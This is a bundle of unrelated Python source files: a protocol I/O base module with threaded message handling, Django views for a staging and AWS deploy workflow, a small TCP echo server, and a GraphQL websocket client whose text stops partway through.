signal.signal(signal.SIGQUIT, signal.SIG_DFL)
signal.signal(signal.SIGUSR1, signal.SIG_DFL)
def _shutdown(self, graceful = False):
if graceful:
logging.info("Worker {0._worker_id} shutting down gracefully.".format(self))
self._shutdown_status = "graceful"
else:
logging.info("Worker {0._worker_id} shutting down immediately.".format(self))
self._shutdown_status = "immediate"
self._kill_child()
def _kill_child(self):
if self._child:
logging.info("Killing child {0}".format(self._child))
if self._child.is_alive():
self._child.terminate()
self._child = None
|
base.py
|
# -*- coding: utf-8 -*-
"""Internal module of protocols with abstract base classes.
Applications should not directly import this module, expect to make subclasses.
As a reminder: all internal strings, like identifier, should be
represented in UTF-8. Use pynt.xmlns.UTF8 if you need help converting."""
# builtin modules
import types
import logging
import time
import threading # for AsyncInput
# import traceback
# local modules
import exceptions
class BaseIOInput(object):
"""Base I/O input. Abstract class, forming a third part of the BaseInput class, along with BaseLangInput and BaseCommandInput"""
timeout = 30 # default time-out in seconds
# I/O SPECIFIC METHODS
def __init__(self):
"""Prepares the actual underlying I/O, given the parameters given at initialization.
(e.g. hostname, port, filename, url, File object). If possible, delays the actual
opening of the I/O till connect() is called, so that setLoginCredentials() can be
called in the mean time."""
pass
def getTarget(self):
"""Return a human-readable identifier of the I/O object. For example, the hostname of the filename"""
return "baseIO"
def connect(self):
"""Opens the actual I/O connection to file or device. This is called, just before login() and authorize()"""
pass
def disconnect(self):
"""closes the I/O connection. You shouldn't call it more than once. Sets the actually I/O object to None, if any"""
pass
def setDefaultTimeout(self, timeout):
self.timeout = int(timeout)
def login(self):
"""Login to a terminal, using I/O specific (rather than language-specific) routines.
Uses the username and password of the BaseLanguageInput"""
pass
def sendcommand(self, string):
"""writes a command as-is to the I/O.
If you call sendcommand(), you must also call readmessage() at some point in time, to avoid
stale results."""
raise NotImplementedError("BaseIOInput.sendcommand() is an abstract method. please override in %s" % type(self).__name__)
self.writetolog(string, input=True)
logger = logging.getLogger("protocols")
logger.debug("Sending command %s" % (repr(string)))
def readmessage(self, timeout):
"""Reads text from the terminal up to the next delimiter. Does return the string as-is,
without checking validity. The result MUST be an UTF-8 encoded string.
Should raise an TimeOut in case more then timeout seconds have been passed."""
raise NotImplementedError("BaseIOInput.readmessage() is an abstract method. please override in %s" % type(self).__name__)
resultString = ""
self.writetolog(resultString, output=True)
logger = logging.getLogger("protocols")
logger.debug("Received %d bytes of data" % len(resultString))
return resultString
class BaseLangInput(object):
"""Base Language input. Abstract method, forming a third part of the BaseInput class, along with BaseIOInput and BaseCommandInput"""
username = ""
password = ""
terminator = "\r\n" # string that signifies the end of a response message
prompt = ">" # string that signifies the start of an input message
delimiter = "\r\n>" # the delimiter := terminator + prompt
# The distinction is only relevant when waiting for the first prompt or the last terminator before the EOF.
# For most languages, the prompt may be a regular expression (though this is not a requirement)
logfile = None
# LANGUAGE SPECIFIC METHODS
def authorize(self):
"""Authorize with a command, using language specific (rather than I/O-specific) routines.
May call send_and_receive(), but NOT command(), since that may be threaded."""
pass
def deauthorize(self):
"""Deauthorize, prior to disconnecting.
May call send_and_receive(), but NOT command(), since that may be threaded."""
pass
def setPrompt(self, prompt):
self.prompt = prompt
self.delimiter = self.terminator + self.prompt
logger = logging.getLogger("protocols")
logger.debug("Set delimiter to %s" % repr(self.delimiter))
def statusOK(self, status, command):
"""Checks the status. returns True is the status is a succesful,
or raises a CommandFailed, possible with additional information."""
status = bool(status)
if not status:
raise CommandFailed("Unexpected status '%s' from command '%s'" % (status, command))
def makeCommand(self, command):
"""Takes a command, and turns it into a string read to send to the device.
It may add a line break (I/O specific), or identifier in the command (language-specific).
Returns a tuple (identifier, commandstring). The identifier may be None
if there is no way to match input command and output result."""
return (None, command+"\n")
def parseMessage(self, resultString):
"""Takes a message, and parses it into a tripley (resultlines, identifier, status)
The resultline is typically an array of strings, the identifier some thing to match
the result to a given command, and the status is unspecified and is language-specific.
May raise a ParsingError in case the output can't be parsed, but does not
raise an exception if the status is unsuccessful."""
resultLines = resultString.split('\n');
return (resultLines, None, True)
def isAutonomousType(self, identifier, status):
"""Given the identifier and status, decide if the message is autonomous,
and if so, if it is of a certain type. For regular (non-autonomous), return False."""
return False
def setLoginCredentials(self, username, password):
"""set login credentials. Set password to "" if no password is required.
The username are used both for login (e.g. telnet/SSH) and authorize (e.g. TL1).
This assumes there is not overlap between login and authorize, which is practice always true."""
self.username = username
if password != None:
self.password = password
def setLogFile(self, logfile):
"""Set log file to the given path"""
assert isinstance(logfile, str)
self.logfile = file(logfile, "a")
def closeLogFile(self):
if self.logfile:
self.logfile.close()
self.logfile = None
def writetolog(self, logstring, input=False, output=False):
"""Write to log file"""
if self.logfile:
self.acquireLoglock()
if input:
self.logfile.write("\n==input==\n")
elif output:
self.logfile.write("\n==output==\n")
else:
self.logfile.write("\n==i/o==\n")
self.logfile.write(logstring)
self.releaseLoglock()
class BaseSyncInput(object):
"""Base Command input, Synchronous version.
Abstract class, forming a third part of the BaseInput class, along with BaseIOInput and BaseLangInput.
The synchronous version does not create new threads, and will only send one command at a time to the
I/O. It will block till a response is returned, and process that one."""
autocallbacks = None # Dictionary with Callback functions for autonomous messages
# COMMAND SPECIFIC METHODS
def getmessage(self, identifier, timeout):
"""Given an identifier, waits till the appropriate message is returned by the device.
This function is blocking, altough it may give a timeout, if nothing was returned in time.
Returns tuple (resultlines, status)."""
endtime = time.time() + timeout
skipcount = 0
logger = logging.getLogger("protocols")
while True:
result = self.readmessage(timeout) # may raise a TimeOut
(resultlines, residentifier, status) = self.parseMessage(result)
autotype = self.isAutonomousType(residentifier, status)
if (autotype != False):
# Autonomous message
if autotype in self.autocallbacks:
callback = self.autocallbacks[autotype]
logger.info("Sending autonomous message (type %s, identifier %s) to %s" % (autotype,residentifier,callback.__name__))
self.callback(callback, resultlines, status)
elif True in self.autocallbacks: # catch-all callback function
callback = self.autocallbacks[True]
logger.info("Sending autonomous message (type %s, identifier %s) to %s" % (autotype,residentifier,callback.__name__))
self.callback(callback, resultlines, status)
else:
logger.warning("Skipping unhandled autonomous message (type %s, identifier %s)" % (autotype,residentifier))
elif identifier == residentifier:
logger.debug("Got matching result for identifier %s" % identifier)
break
else:
skipcount += 1
logger.error("Skipping regular message with identifier %s" % (residentifier))
if time.time() > endtime:
raise exceptions.TimeOut("No reply with correct identifier %s after %d seconds (skipped %d responses)" % (identifier, timeout, skipcount))
resultlines = []
status = False
break
return (resultlines, status)
def send_and_receive(self, command, timeout):
"""Shortcut for makeCommand(), sendcommand(), readmessage(), parseMessage().
This only works for synchronous I/O. For asynchronous I/O, this function
is only be used for authorization and de-authorization. Returns a tuple (resultlines, status)."""
(identifier, string) = self.makeCommand(command)
self.sendcommand(string)
(resultlines, status) = self.getmessage(identifier, timeout=timeout)
self.statusOK(status, command)
return (resultlines, status)
def command(self, command, timeout=None):
"""The main functons of BaseInput. Takes a command, and returns the result as an array of strings.
Makes sure the result is a match of the given command, and no error status was raised.
Language, I/O, and sync/async specific."""
if timeout == None:
timeout = self.timeout
(resultlines, status) = self.send_and_receive(command, timeout)
self.statusOK(status, command)
return resultlines
def isCorrectCallback(self, callback):
"""Verifies that the callback function has the proper format: f(lines) or f(lines, status=None).
Returns a boolean; does not raise an exception on error"""
if isinstance(callback, types.FunctionType):
argnames = callback.func_code.co_varnames
argcount = callback.func_code.co_argcount
return (argcount in [1,2])
elif isinstance(callback, types.MethodType):
argcount = callback.func_code.co_argcount
return (argcount in [2,3])
else:
return False
def hasStatusArgument(self, callback):
"""Verifies that the callback function has the proper format: f(lines) or f(lines, status=None).
Returns a boolean; does not raise an exception on error"""
if isinstance(callback, types.FunctionType):
argcount = callback.func_code.co_argcount
return (argcount == 2)
elif isinstance(callback, types.MethodType):
argcount = callback.func_code.co_argcount
return (argcount == 3)
else:
return False
def callbackCommand(self, command, callback, timeout=None):
"""The main functons of BaseInput. Takes a command, and sends the result to the
callback functions. The function returns immediately, and is mostly asynchronous,
if possible by the underlying I/O."""
assert self.isCorrectCallback(callback)
# ("Callback function %s has not the proper argument list: %s(resultlines) or %s(resultline, status=None)", (callback.func_name,callback.func_name,callback.func_name))
if timeout == None:
timeout = self.timeout
(resultlines, status) = self.send_and_receive(command, timeout)
self.statusOK(status, command)
self.callback(callback, resultlines, status=status)
def callback(self, function, resultlines, status=None):
"""Call function with resultlines as argument. Either in a new thread or simply the current thread."""
if self.hasStatusArgument(function):
function(resultlines, status)
else:
function(resultlines)
def setAutonomousCallback(self, callback, autotype=True):
"""Set the function which is called for autonomous messages. If type is set, the function is
only called when isAutonomousType() in Language parser returns the same string"""
assert self.isCorrectCallback(callback)
# ("Callback function %s has not the proper argument list: %s(resultlines) or %s(resultline, status=None)", (callback.func_name,callback.func_name,callback.func_name))
if not self.autocallbacks:
self.autocallbacks = {}
assert autotype != None
logger = logging.getLogger("protocols")
logger.debug("Assigning callback function %s() to callback type %s" % (callback.__name__, autotype))
self.autocallbacks[autotype] = callback
def start(self):
"""Make sure the actual I/O for the file or device is ready. logs in, authorize.
You shouldn't call it more than once"""
logger = logging.getLogger("protocols")
logger.debug("Fetching information from %s using %s" % (self.getTarget(), type(self).__name__))
if not self.autocallbacks:
self.autocallbacks = {}
self.connect()
self.login()
self.authorize()
def stop(self):
"""Deauthorizes, logs out, and closes the I/O connection. You shouldn't call it more than once"""
self.deauthorize()
self.disconnect()
self.closeLogFile()
def acquireMemLock(self):
return True;
def releaseMemLock(self):
return True;
def acquireLoglock(self):
return True;
def releaseLoglock(self):
return True;
class BaseAsyncInput(BaseSyncInput):
"""Base Command input, Asynchronous version.
Abstract class, forming a third part of the BaseInput class, along with BaseIOInput and BaseLangInput.
The asynchronous version uses two threads: one to send commands, and one to receive them.
If command() is used, it is still blocking, but with callbackCommand() multiple commands can be send
to a device at the same time. This function is obviously thread-safe. Other Input classes wanting to
remain thread safe, should liberously call acquireIOlock() and acquireMemLock(), and release*Lock() of course"""
messages = None # dict (set in createThreads) of identifier: (status, resultlines)
callbacks = None # dict (set in createThreads) of identifier: (callback, timeout). Unset for synchronous messages.
receivethread = None # threading.Thread() object. continuously fetches information from the device.
dorun = False # signal the receivethread to keep running, or to stop.
threadedcallback = False # If True, callbacks are made in a new thread
callbackthread = None # dict of Threads
# COMMAND SPECIFIC METHODS
def send_and_receive(self, command, timeout):
"""Shortcut for makeCommand(), sendcommand(), readmessage(), parseMessage().
This only works for synchronous I/O. For asynchronous I/O, this function
is only be used for authorization and de-authorization. Returns a tuple (resultlines, status).
This function is strictly synchronous and does not directly call getmessage(), since that is asynchronous"""
(cmdidentifier, string) = self.makeCommand(command)
self.sendcommand(string)
result = self.readmessage(timeout) # may raise a TimeOut
(resultlines, residentifier, status) = self.parseMessage(result)
self.statusOK(status, command)
if cmdidentifier != residentifier:
raise CommandFailed("Result identifier %s does not match command identifier %s for command %s." % (residentifier, cmdidentifier, command))
return (resultlines, status)
def command(self, command, timeout=None):
"""The main functons of BaseInput. Takes a command, and returns the result as an array of strings.
Makes sure the result is a match of the given command, and no error status was raised.
Language, I/O, and sync/async specific."""
(identifier, string) = self.makeCommand(command)
# self.addIdentifierCallback(identifier, None, timeout)
try:
self.sendcommand(string)
if timeout == None:
timeout = self.timeout
(resultlines, status) = self.getmessage(identifier, timeout=timeout)
self.statusOK(status, command)
except: # all exceptions, including keyboard-interupts
self.stopThreads(timeout=0)
raise
return resultlines
def callbackCommand(self, command, callback, timeout=None):
"""The main functons of BaseInput. Takes a command, and sends the result to the
callback functions. The function returns immediately, and is mostly asynchronous,
if possible by the underlying I/O."""
assert self.isCorrectCallback(callback)
# ("Callback function %s has not the proper argument list: %s(resultlines) or %s(resultline, status=None)", (callback.func_name,callback.func_name,callback.func_name))
try:
(identifier, string) = self.makeCommand(command)
self.addIdentifierCallback(identifier, callback, timeout)
self.sendcommand(string)
except: # all exceptions, including keyboard-interupts
self.stopThreads(timeout=0)
raise
def addIdentifierCallback(self, identifier, callback, timeout=None):
"""Adds parameters for the callback to the callbacks variable"""
if timeout == None:
timeout = self.timeout
self.acquireMemLock()
if identifier in self.callbacks:
raise NetworkException("A command with identifier %s was already sent. Can't use the same identifier more than once in asynchronous mode." % identifier)
logger = logging.getLogger("protocols")
logger.debug("Remember callback function %s() for identifier %s" % (callback.__name__, identifier))
self.callbacks[identifier] = (callback, time.time()+timeout)
self.releaseMemLock()
def getmessage(self, identifier, timeout):
"""Given an identifier, waits till the appropriate message shows up in the messages{} dictionary.
This function is blocking, altough it may give a timeout, if nothing was returned in time.
Returns tuple (resultlines, status). This function must only be called for async mode. For sync mode, call send_and_receive"""
if identifier in self.callbacks:
raise AssertionError("getmessages() should not be called with an identifier (%s) present in self.callbacks" % identifier)
endtime = time.time() + timeout
while identifier not in self.messages:
time.sleep(0.04)
if time.time() > endtime:
break
if identifier not in self.messages:
raise exceptions.TimeOut("identifier %s not found in messages within %d seconds. Available identifiers: %s" % (identifier, timeout, str(self.messages.keys())))
self.acquireMemLock()
if identifier in self.messages:
(resultlines, status) = self.messages[identifier]
del self.messages[identifier]
self.releaseMemLock()
return (resultlines, status)
def checkTimeouts(self):
"""Check if the timeouts in callbacks{} have not been passed. If it has, a result was received,
but the result was not used."""
# TODO: decide on return result. En eh, to be written too
pass
def callback(self, function, resultlines, status=None):
"""Call function with resultlines as argument. Either in a new thread or simply the current thread."""
if self.threadedcallback:
name = function.__name__ + " callback"
if self.hasStatusArgument(function):
arguments = (resultlines, status) # create a tuple
else:
arguments = (resultlines,) # create a tuple
callbackthread = threading.Thread(target=function, name=name, args=arguments)
callbackthread.start()
self.callbackthreads.append(callbackthread)
else:
if self.hasStatusArgument(function):
function(resultlines, status)
else:
function(resultlines)
def processMessage(self, message):
"""Calls parseMessage and checks the type of the message. Calls the callback function for autonomous
messages or regular results with a known callback function. Otherwise, simply add the message to
the messages dictionary, so it can be retrieved by getmessage() in another thread."""
logger = logging.getLogger("protocols")
(resultlines, identifier, status) = self.parseMessage(message)
autotype = self.isAutonomousType(identifier, status)
if (autotype != False):
# Autonomous message
if autotype in self.autocallbacks: # specific callback function
callback = self.autocallbacks[autotype]
logger.info("Sending autonomous message (type %s, identifier %s) to %s()" % (autotype,identifier,callback.__name__))
self.callback(callback, resultlines, status=status)
elif True in self.autocallbacks: # catch-all callback function
callback = self.autocallbacks[True]
logger.info("Sending autonomous message (type %s, identifier %s) to %s()" % (autotype,identifier,callback.__name__))
self.callback(callback, resultlines, status=status)
else:
logger.info("Skipping unhandled autonomous message (type %s, identifier %s)" % (autotype,identifier))
return
callback = None
self.acquireMemLock()
if identifier in self.callbacks:
# regular message, with known callback function
(callback, timeout) = self.callbacks[identifier]
del self.callbacks[identifier]
self.releaseMemLock()
if callback:
logger.info("Sending regular message with identifier %s to %s()" % (identifier,callback.__name__))
self.callback(callback, resultlines, status)
else:
# regular message
self.acquireMemLock()
if identifier in self.messages:
raise CommandFailed("Can't append result with identifier %s: a result with the same identifer already exists." % identifier)
logger.debug("Appending message result with identifier %s to messages queue" % (identifier))
self.messages[identifier] = (resultlines, status)
self.releaseMemLock()
def fetchMessages(self):
"""Function in a separate thread. Repeatedly call readmessage(timeout=infinity), and
processMessage() with ayny possible result. The thread is stopped if dorun is set to False.
Call CheckTimeouts() every once in a while"""
timeout = max(2,int(self.timeout/3)) # a short timeout (max 2 sec.), so we're quickly back in the loop
logger = logging.getLogger("protocols")
logger.debug("Asynchronously fetching messages with %0.1f second interval" % (timeout))
while (self.dorun == True) or (len(self.callbacks) > 0):
try:
message = self.readmessage(timeout=timeout)
# logger.debug("Got %d bytes of data" % (len(message)))
self.processMessage(message)
except exceptions.TimeOut:
logger.debug("Waiting for data")
pass
self.checkTimeouts()
def createThreads(self):
"""Initializes internal variables, and start listening thread. This function is called
after login() and authorize() are called."""
self.messages = {}
self.callbacks = {}
self.callbackthreads = []
name = "Thread-"+self.getTarget()+"-receiver"
self.receivethread = threading.Thread(target=self.fetchMessages, name=name)
self.dorun = True
self.receivethread.start()
def stopThreads(self, timeout=None):
# Signal thread to stop, and stop it with a timeout
logger = logging.getLogger("protocols")
self.dorun = False
if timeout == None:
timeout = 1.2*self.timeout # Add a little margin; we may have to wait for many connections..
logger.debug("Stopping receiver threads (with %d sec timeout)" % timeout)
self.receivethread.join(timeout=timeout)
logger.debug("Stopping %d parser threads (with %d sec timeout each)" % (len(self.callbackthreads), timeout))
for callbackthread in self.callbackthreads:
callbackthread.join(timeout=timeout)
if len(self.messages) > 0:
logger.error("Unprocessed messages left in queue with id %s, after stopping listener thread" % str(self.messages.keys()))
if self.receivethread.isAlive():
logger.error("Receiver thread is still active, despite an attempt to stop it.")
def acquireMemLock(self):
"""Acquires memory lock. This function can only be called after start() has been called"""
return self.memlock.acquire() # blocking
# WARNING: Function with time-out doesn't work very well, because of the delay
# (thread A never got the lock, since thread B held the lock for a long time, and
# got it back before A -- apparently it was not handed out in request order)
# gotlock = False
# endtime = time.time() + 10 # 10 sec timeout
# logger = logging.getLogger("protocols")
# (callerfilename, linenumber, callername, text) = traceback.extract_stack()[-2]
# logger.debug("Acquire memory lock id %s from %s() in file %s by thread %s" % (id(self.loglock), callername, callerfilename, threading.currentThread().getName()))
# while True:
# gotlock = self.memlock.acquire(False) # non-blocking
# if gotlock:
# break
# if time.time() > endtime:
# raise exceptions.TimeOut("Unable to get a memory lock in 10 seconds.")
# time.sleep(0.05)
# return gotlock;
def releaseMemLock(self):
"""Releases memory lock. You MUST never call releaseMemLock() if you didn't acquire it first."""
# logger = logging.getLogger("protocols")
# logger.debug("Release memory lock id %s" % id(self.memlock))
self.memlock.release()
return True;
def acquireLoglock(self):
"""Acquires I/O lock. This function can only be called after start() has been called"""
gotlock = False
endtime = time.time() + 10 # 10 sec timeout
# logger = logging.getLogger("protocols")
# logger.debug("Acquire log lock by thread %s" % (threading.currentThread().getName()))
while True:
gotlock = self.iolock.acquire(False) # non-blocking
if gotlock:
break
if time.time() > endtime:
raise exceptions.TimeOut("Thread %s is unable to get a log lock in 10 seconds." % (threading.currentThread().getName()))
time.sleep(0.05)
return gotlock;
def releaseLoglock(self):
"""Releases I/O lock. You MUST never call releaseMemLock() if you didn't acquire it first."""
# logger = logging.getLogger("protocols")
# logger.debug("Release log lock by thread %s" % (threading.currentThread().getName()))
self.iolock.release()
return True;
def start(self):
"""Make sure the actual I/O for the file or device is ready. logs in, authorize.
You shouldn't call it more than once"""
logger = logging.getLogger("protocols")
logger.debug("Fetching information asynchronous from %s using %s" % (self.getTarget(), type(self).__name__))
if not self.autocallbacks:
self.autocallbacks = {}
self.iolock = threading.Lock()
self.memlock = threading.Lock()
self.connect()
self.login()
self.authorize() # call authorize while still in sync mode. It uses send_and_receive().
self.createThreads()
def stop(self):
"""Deauthorizes, logs out, and closes the I/O connection. You shouldn't call it more than once"""
self.stopThreads()
self.deauthorize() # deauthorize used send_and_receive, and is thus synchronous
self.disconnect()
self.closeLogFile()
self.iolock = None
self.memlock = None
# Note: methods in first class override methods in later classes
class BaseInput(BaseIOInput, BaseLangInput, BaseAsyncInput):
"""A base input class, consisting of three parts working togther:
the I/O, Language and Command part"""
pass
|
views.py
|
from django.shortcuts import render
from django.http import HttpResponse, HttpResponseRedirect
from django.template import loader
from django.utils import timezone, dateformat
from django.urls import reverse
from threading import Thread
from pathlib import Path
from .models import Status
from .forms import CsvForm
from .services import Stager, WaxHelper, LogFinder
def index(request):
"""
"""
if request.method == 'POST':
status = Status.objects.create(date=timezone.now())
status.save()
return HttpResponseRedirect(reverse('stage:workflow', args=(status.id,)))
else:
template = loader.get_template('stage/index.html')
status_list = Status.objects.order_by('-date')
context = {'data': status_list}
return HttpResponse(template.render(context, request))
def workflow(request, status_id):
"""
"""
template = loader.get_template('stage/workflow.html')
status = Status.objects.get(pk=status_id)
csv_form = CsvForm()
context = {'status': status,
'csv_form': csv_form}
return HttpResponse(template.render(context, request))
def detail(request, status_id):
"""
"""
return HttpResponse("You're looking at question %s." % status_id)
def output_file_path(status_id, phase):
"""
"""
BASE_DIR = Path(__file__).resolve().parent.parent
return f"%s/logs/stage/{status_id}-{phase}.txt" %str(BASE_DIR)
def stage_csv(request, status_id):
"""
"""
status = Status.objects.get(pk=status_id)
if request.method == 'POST':
form = CsvForm(request.POST)
if form.is_valid():
filename = form.cleaned_data['csv_filename']
try:
output = output_file_path(status_id, "csv")
Stager.stage_csv(form.cleaned_data['csv_filename'], output)
except Exception as e:
return render(request, 'stage/stage_csv.html', {
'error_msg': str(e),
'status': status
})
# Update status
status.csv_staged = True
status.save()
template = loader.get_template('stage/stage_csv.html')
context = {'status': status,
'filename' : filename,
'csv_staged': status.csv_staged}
return HttpResponse(template.render(context, request))
else:
form = CsvForm()
return render(request, 'stage/stage_csv.html', {'form': form})
def stage_images(request, status_id):
"""
"""
status = Status.objects.get(pk=status_id)
output = output_file_path(status_id, "images")
t = Thread(target=Stager.stage_images, args=(output,))
t.start()
# Update status
status.images_staged = True
status.save()
dt = dateformat.format(timezone.now(), 'Y-m-d H:i:s')
context = {'msg' : f"Image staging initiated: %s" %dt,
'out' : f"stage/images-{status_id}.txt",
'status': status}
template = loader.get_template('stage/stage_images.html')
return HttpResponse(template.render(context, request))
def generate_derivatives(request, status_id):
"""
"""
output = output_file_path(status_id, "derivatives")
t = Thread(target=WaxHelper.generate_derivatives, args=(output,))
t.start()
status = Status.objects.get(pk=status_id)
# Update status
status.derivatives_generated = True
status.save()
dt = dateformat.format(timezone.now(), 'Y-m-d H:i:s')
context = {'msg' : f"Derivative generation initiated: %s" %dt,
'out' : f"stage/derivatives-{status_id}.txt",
'status': status}
template = loader.get_template('stage/generate_derivatives.html')
return HttpResponse(template.render(context, request))
def derivative_logs(request, status_id):
"""
"""
log = output_file_path(status_id, "derivatives")
data = LogFinder.find(log, "TIFFFetchNormalTag")
return HttpResponse(data)
def images_logs(request, status_id):
"""
"""
log = output_file_path(status_id, "images")
data = LogFinder.find(log)
return HttpResponse(data)
def pages_logs(request, status_id):
"""
"""
log = output_file_path(status_id, "pages")
data = LogFinder.find(log)
return HttpResponse(data)
def index_logs(request, status_id):
"""
"""
log = output_file_path(status_id, "index")
data = LogFinder.find(log)
return HttpResponse(data)
def run_local_logs(request, status_id):
"""
"""
log = output_file_path(status_id, "run")
data = LogFinder.find(log)
return HttpResponse(data)
def deploy_logs(request, status_id):
"""
"""
log = output_file_path(status_id, "deploy")
data = LogFinder.find(log)
return HttpResponse(data)
def generate_pages(request, status_id):
"""
"""
output = output_file_path(status_id, "pages")
t = Thread(target=WaxHelper.generate_pages, args=(output,))
t.start()
status = Status.objects.get(pk=status_id)
# Update status
status.pages_generated = True
status.save()
dt = dateformat.format(timezone.now(), 'Y-m-d H:i:s')
context = {'msg' : f"Page generation initiated: %s" %dt,
'out' : f"stage/pages-{status_id}.txt",
'status': status}
template = loader.get_template('stage/generate_pages.html')
return HttpResponse(template.render(context, request))
def generate_index(request, status_id):
"""
"""
output = output_file_path(status_id, "index")
t = Thread(target=WaxHelper.generate_index, args=(output,))
t.start()
status = Status.objects.get(pk=status_id)
# Update status
status.indexes_rebuilt = True
status.save()
dt = dateformat.format(timezone.now(), 'Y-m-d H:i:s')
context = {'msg' : f"Index generation initiated: %s" %dt,
'out' : f"stage/index-{status_id}.txt",
'status': status}
template = loader.get_template('stage/generate_index.html')
return HttpResponse(template.render(context, request))
def run_local_site(request, status_id):
"""
"""
output = output_file_path(status_id, "run")
t = Thread(target=WaxHelper.run_local, args=(output,))
t.start()
status = Status.objects.get(pk=status_id)
# Update status
status.deploy_local = True
status.save()
dt = dateformat.format(timezone.now(), 'Y-m-d H:i:s')
context = {'msg' : f"Local site initiated: %s" %dt,
'out' : f"stage/run-{status_id}.txt",
'status': status}
template = loader.get_template('stage/run_local.html')
return HttpResponse(template.render(context, request))
def kill_local_site(request, status_id):
"""
"""
WaxHelper.kill_local()
status = Status.objects.get(pk=status_id)
# Update status
status.kill_local = True
status.save()
dt = dateformat.format(timezone.now(), 'Y-m-d H:i:s')
context = {'msg' : f"Local site stopped: %s" %dt,
'status': status}
template = loader.get_template('stage/kill_local.html')
return HttpResponse(template.render(context, request))
def deploy(request, status_id):
"""
"""
output = output_file_path(status_id, "deploy")
t = Thread(target=WaxHelper.deploy, args=(output,))
t.start()
status = Status.objects.get(pk=status_id)
# Update status
status.deploy_aws = True
status.save()
dt = dateformat.format(timezone.now(), 'Y-m-d H:i:s')
context = {'msg' : f"Deploying to AWS: %s" %dt,
'out' : f"stage/deploy-{status_id}.txt",
'status': status}
template = loader.get_template('stage/deploy.html')
return HttpResponse(template.render(context, request))
|
echoserver.py
|
import socket
import threading
import argparse
def run_server(host, port):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
listener.bind((host, port))
listener.listen(5)
print('Echo server is listening at', port)
while True:
conn, addr = listener.accept()
threading.Thread(target=handle_client, args=(conn, addr)).start()
finally:
listener.close()
def handle_client(conn, addr):
print 'New client from', addr
try:
while True:
data = conn.recv(1024)
if not data:
break
conn.sendall(data)
finally:
conn.close()
# Usage python echoserver.py [--port port-number]
parser = argparse.ArgumentParser()
parser.add_argument("--port", help="echo server port", type=int, default=8007)
args = parser.parse_args()
run_server('', args.port)
|
graphql_client.py
|
"""
GraphQL Client
"""
from datetime import datetime
import json
import random
import string
import threading
import time
import websocket
from six.moves import urllib
from . import __version__
class GraphQLClient:
"""
A simple GraphQL client
"""
def __init__(self, endpoint, session=None, verify=True):
self.endpoint = endpoint
self.headername = None
self.session = session
self.token = None
self.verify = verify
def execute(self, query, variables=None):
"""
Execute a query
Parameters
----------
- query
- variables
"""
return self._send(query, variables)
def inject_token(self, token, headername='Authorization'):
"""
Inject a token
Parameters
----------
- token
- headername: by default "Authorization"
"""
self.token = token
self.headername = headername
def _send(self, query, variables):
"""
Send the query
Parameters
----------
- query
- variables
"""
data = {'query': query,
'variables': variables}
headers = {'Accept': 'application/json',
'Content-Type': 'application/json',
'X-Powered-By': f'Kili Playground/{__version__}'}
if self.token is not None:
headers[self.headername] = f'{self.token}'
if self.session is not None:
try:
number_of_trials = 10
for _ in range(number_of_trials):
self.session.verify = self.verify
req = self.session.post(self.endpoint, json.dumps(
data).encode('utf-8'), headers=headers)
if req.status_code == 200 and 'errors' not in req.json():
break
time.sleep(1)
return req.json()
except Exception as exception:
if req is not None:
raise Exception(req.content) from exception
raise exception
req = urllib.request.Request(
self.endpoint, json.dumps(data).encode('utf-8'), headers)
try:
with urllib.request.urlopen(req) as response:
str_json = response.read().decode('utf-8')
return json.loads(str_json)
except urllib.error.HTTPError as error:
print((error.read()))
print('')
raise error
GQL_WS_SUBPROTOCOL = "graphql-ws"
class SubscriptionGraphQLClient:
"""
A simple GraphQL client that works over Websocket as the transport
protocol, instead of HTTP.
This follows the Apollo protocol.
https://github.com/apollographql/subscriptions-transport-ws/blob/master/PROTOCOL.md
"""
# pylint: disable=too-many-instance-attributes, too-many-arguments
def __init__(self, url):
self.ws_url = url
self._id = None
self._paused = False
self._connect()
self._subscription_running = False
self._st_id = None
self.failed_connection_attempts = 0
def _connect(self):
"""
Handles the connection
"""
# pylint: disable=no-member
self._conn = websocket.create_connection(self.ws_url,
on_message=self._on_message,
subprotocols=[GQL_WS_SUBPROTOCOL])
self._created_at = datetime.now()
self._conn.on_message = self._on_message
def _reconnect(self):
"""
Handles the reconnection
"""
self._connect()
self._subscription_running = True
dt_string = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
print(f'{dt_string} reconnected')
self.failed_connection_attempts = 0
def _on_message(self, message):
"""
Handles messages
Parameters
----------
- message : the message
"""
# pylint: disable=no-self-use
data = json.loads(message)
# skip keepalive messages
if data['type'] != 'ka':
print(message)
def _conn_init(self, headers=None, authorization=None):
"""
Initializes the websocket connection
Parameters
----------
- headers : Headers are necessary for Kili API v1
- authorization : Headers are necessary for Kili API v2
"""
payload = {
'type': 'connection_init',
'payload': {'headers': headers, 'Authorization': authorization}
}
self._conn.send(json.dumps(payload))
self._conn.recv()
def _start(self, payload):
"""
Handles start
Parameters
----------
- payload
"""
_id = gen_id()
frame = {'id': _id, 'type': 'start', 'payload': payload}
self._conn.send(json.dumps(frame))
return _id
def _stop(self, _id):
"""
Handles stop
Parameters
----------
- _id: connection id
"""
payload = {'id': _id, 'type': 'stop'}
self._conn.send(json.dumps(payload))
return self._conn.recv()
def query(self, query, variables=None, headers=None):
"""
Sends a query
Parameters
----------
- query
- variables
- headers
"""
self._conn_init(headers)
payload = {'headers': headers, 'query': query, 'variables': variables}
_id = self._start(payload)
res = self._conn.recv()
self._stop(_id)
return res
def prepare_subscribe(self, query, variables, headers, callback, authorization):
"""
Prepares a subscription
Parameters
----------
- query
- variables
- headers
- callback: function executed after the subscription
- authorization: authorization header
"""
self._conn_init(headers, authorization)
payload = {'headers': headers, 'query': query, 'variables': variables}
_cc = self._on_message if not callback else callback
_id = self._start(payload)
self._id = _id
return _cc, _id
def subscribe(self, query, variables=None, headers=None, callback=None, authorization=None):
"""
Subscribes
Parameters
----------
- query
- variables
- headers
- callback: function executed after the subscription
- authorization: authorization header
"""
_cc, _id = self.prepare_subscribe(
query, variables, headers, callback, authorization)
def subs(_cc, _id):
max_reconnections = 10
self._subscription_running = True
while self._subscription_running \
and self.failed_connection_attempts < max_reconnections:
try:
response = json.loads(self._conn.recv())
if response['type'] == 'error' or response['type'] == 'complete':
print(response)
self._stop_subscribe(_id)
break
if response['type'] != 'ka' and not self._paused:
_cc(_id, response)
time.sleep(1)
except websocket._exceptions.WebSocketConnectionClosedException as error: # pylint: disable=no-member,protected-access
self.failed_connection_attempts += 1
dt_string = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
error_message = str(error)
print(f'{dt_string} Connection closed error : {error_message}')
print(
'Will try to reconnect'
